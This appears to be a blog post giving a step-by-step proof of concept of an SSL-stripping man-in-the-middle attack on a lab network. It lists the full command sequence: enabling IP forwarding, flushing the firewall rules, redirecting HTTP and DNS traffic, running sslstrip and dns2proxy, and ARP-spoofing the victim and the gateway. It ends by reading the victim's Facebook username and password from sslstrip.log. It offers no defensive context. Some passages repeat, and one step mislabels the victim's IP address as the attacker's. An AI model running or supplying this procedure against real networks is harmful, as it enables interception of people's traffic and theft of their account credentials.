POC OF sslstrip with dns2proxy
POC OF sslstrip with dns2proxy
Introduction:-
This is a POC of sslstrip. Here We intercept the traffic and get all the juicy data enter by the victim
by using the sslstrip-master,dns2proxy-master
by using the sslstrip-master,dns2proxy-master
Lab Environment:-
Attacker’s operating system:-linux kali 4.13.0-kali-amd64
Victim’s operating system:-window 7
Required tools:-sslstrip-master,dns2proxy-master
Steps of attack:-
Step 1:
#cd sslstrip-master/(change directory to sslstrip-master)
#python setup.py install(install sslstrip-master)
Step 2:
#echo “1” > /proc/sys/net/ipv4/ip_forward(Enables IP forwarding)
#iptables --flush(Removing all firewall rules)
#iptables --flush -t nat()
#iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000(forward
all the traffic to port number 9000)
all the traffic to port number 9000)
#iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53
Step 3:
#ifconfig(for finding the ip address of the attacker’s machine 192.168.29.135)
#route -n(for finding the gateway ip address 192.168.29.2)
Step 4:
#ipconfig(ip address of the attacker’s machine 192.168.29.133)
Step 5:
#cd ..
#cd dns2proxy-master/(change directory to dns2proxy-master)
#python dns2proxy.py(starting dns2proxy-master)
Step 6:
#sslstrip -l 9000(starting listening on port number 9000)
Step 7:
#arpspoof -i eth0 -t 192.168.29.133 192.168.29.2
Step 8:
#arpspoof -i eth0 -t 192.168.29.2 192.168.29.133
Now attack starts:- victim serving anything on their browser we can easily intercept the traffic and
get all the juicy data that they enter on their browser. Now lets see Victim open a facebook and try
to login into their account and after logged in we get the password and id of the victim.after the complete
the process of login sslstrip.log file is there in which all the data of the victim will be there
get all the juicy data that they enter on their browser. Now lets see Victim open a facebook and try
to login into their account and after logged in we get the password and id of the victim.after the complete
the process of login sslstrip.log file is there in which all the data of the victim will be there
Step 9:
#cat sslstrip.log(for reading the sslstrip.log)
In last we get the password and id of the victim enter by it into the facebook page.
video :- POC of this attack
Comments
Post a Comment